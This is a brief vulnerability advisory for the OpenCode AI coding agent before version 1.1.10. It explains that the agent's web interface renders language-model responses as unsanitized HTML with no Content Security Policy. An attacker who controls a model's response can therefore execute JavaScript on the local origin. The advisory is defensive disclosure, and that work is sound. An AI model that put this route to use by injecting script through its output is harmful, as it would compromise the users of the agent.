CVE-2026-22813

Name of the Vulnerable Software and Affected Versions OpenCode versions prior to 1.1.10

Description The software is an open source AI coding agent. The markdown renderer used for responses from large language models inserts arbitrary HTML into the Document Object Model (DOM) without sanitization. There is no Content Security Policy (CSP) implemented on the web interface to prevent JavaScript execution through HTML injection. This allows an attacker to control the large language model response for a chat session and achieve JavaScript execution on the 'http://localhost:4096' origin.

Recommendations Update to version 1.1.10 or later.